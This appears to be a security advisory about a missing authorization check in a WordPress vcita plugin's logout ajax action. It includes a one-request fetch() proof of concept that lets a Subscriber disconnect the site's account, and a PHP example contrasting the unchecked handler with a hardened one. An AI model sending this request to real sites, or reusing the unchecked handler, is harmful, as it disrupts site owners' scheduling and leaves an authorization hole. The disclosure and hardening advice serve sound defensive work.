The plugin does not perform an authorization check in the vcita_logout ajax action, allowing any logged-in user (with a role as low as Subscriber) to log the site out of its vcita account, causing a denial of service for the appointment scheduling functionality.
fetch("/wp-admin/admin-ajax.php?action=vcita_logout", {
    method: "POST",
    headers: {
        Accept: "*/*",
        "Content-Type": "application/json",
    },
});
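For contrast, an added example (not the plugin's own code) of what the missing check looks like in a WordPress admin-ajax handler and how the handler is hardened with a capability check and a nonce; the function names and the option name are hypothetical:

```php
<?php
// Added example, not the plugin's code. The callback names and the option
// name "vcita_token_placeholder" are assumptions used only for illustration.

// Vulnerable pattern: the wp_ajax_ hook fires for every authenticated user,
// so without an explicit check any logged-in role can reach the state change.
function example_vcita_logout_unchecked() {
    delete_option( 'vcita_token_placeholder' ); // disconnects the site from the account
    wp_send_json_success();
}

// Hardened pattern: authorize first, then verify the request was intentional.
function example_vcita_logout_checked() {
    // 1. Authorization: only users allowed to manage site settings may disconnect.
    //    wp_send_json_error() terminates the request after sending the response.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 2. CSRF protection: the request must carry a nonce created for this action
    //    (wp_create_nonce( 'vcita_logout_nonce' ), passed to the admin script
    //    via wp_localize_script). check_ajax_referer() dies on a missing or
    //    invalid nonce, so code below it only runs for a verified request.
    check_ajax_referer( 'vcita_logout_nonce', 'nonce' );

    delete_option( 'vcita_token_placeholder' );
    wp_send_json_success();
}

// Register only the hardened callback for the ajax action.
add_action( 'wp_ajax_vcita_logout', 'example_vcita_logout_checked' );
```

With the hardened handler, the request shown above returns a 403 for a Subscriber, and even an administrator's request fails unless it includes the `nonce` parameter.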